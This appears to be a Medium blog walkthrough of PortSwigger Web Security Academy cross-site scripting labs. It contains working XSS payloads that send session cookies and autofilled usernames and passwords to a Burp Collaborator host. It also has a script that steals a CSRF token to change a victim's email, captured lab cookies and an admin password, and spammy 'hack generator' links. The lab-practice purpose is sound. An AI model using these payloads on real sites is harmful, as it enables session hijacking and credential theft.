Cross site scripting | xss explain(PORTSWIGGER solve)

Reflected xss lab
For this lab we are going to enter a post and make a comment while intercepting all packets in the background using the burpsuite tool. Then we send it to the repeater and prepare our payload.<script>document.location='http://yourID.burpcollaborator.net/?'+document.cookie</script>So we send it on the repeater, and wait for the response on the burp collaborator.Also select payload in burp and press CTRL+U to URL encode in burp.
secret=avJbuCyJJiBnI7NFZJ4sbbdOXdKAb4Py; session=4TWOZsQYlS5PASECvxhQPUONxdZ5qi6l

Lab 3 : Exploiting cross-site scripting to capture passwords

<input required="" type="username" name="username">
<input required="" type="password" name="password">
document.getElementsByName("username")[0].value
document.getElementsByName("password")[0].value
<input required="" type="username" name="username"><input required="" type="password" name="password"><script>document.location='your-burpC-ID.burpcollaborator.net/?'+document.getElementsByName("username")[0].value+'&'+document.getElementsByName("password")[0].value</script>
But it sends it without information, this can happen because at the time of making the document.location the autocomplete has not yet been carried out, so we will use the onchange attribute.<input required="" type="username" name="username"><input required="" type="password" name="password" onchange="document.location='http://YOUR-ID.burpcollaborator.net/?'+document.getElementsByName('username')[0].value+'&'+document.getElementsByName('password')[0].value">
administrator:ef6gbovly0a77qvxul8i

Lab: Exploiting XSS to perform CSRF

POST /email/change-email HTTP/1.1
Host: ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
Origin: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net
DNT: 1
Connection: close
Referer: https://ac411fe71f8b856f80352cd100b300fe.web-security-academy.net/email
Cookie: session=aFgfuzayL8jK1xA5jr3j6Z1fQvH6Kbsv
Upgrade-Insecure-Requests: 1

email=a%40a.a&csrf=6f8A1jOKIzioIeAGRZayu2KCRH2q0mTf
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=a@a.a')
};
</script>

Career in Cyber security. Technolgy lover.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} Never have I ever: Naked Truth Hack Free Resources Generator

{UPDATE} Devarai Crosswords Hack Free Resources Generator

{UPDATE} 轉學生的戀愛日記 Hack Free Resources Generator

@epnsproject is thrilled to share that the next EPNS Governance Proposal is now LIVE🙌

{UPDATE} 1000 Miles Hack Free Resources Generator

pSTAKE Alpha Release & Bug Bounty Program: Full Details

Digital Forensics Blog 06 — Malware Forensics Hands On: A Dynamic Analysis to Fantom Ransomware

Application Security Engineer: Roles, Skills, Responsibilities

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
vijay nariyal

vijay nariyal

Career in Cyber security. Technolgy lover.

More from Medium

Remote Code Execution Web Application Vulnerability : Prevention Part

Manual SQL Injection Exploitation | Burp Suite | Game Zone |

XSS | HTML Injection and File Upload Bypass in HUAWEI Subdomain

picoCTF: Tab, Tab, Attack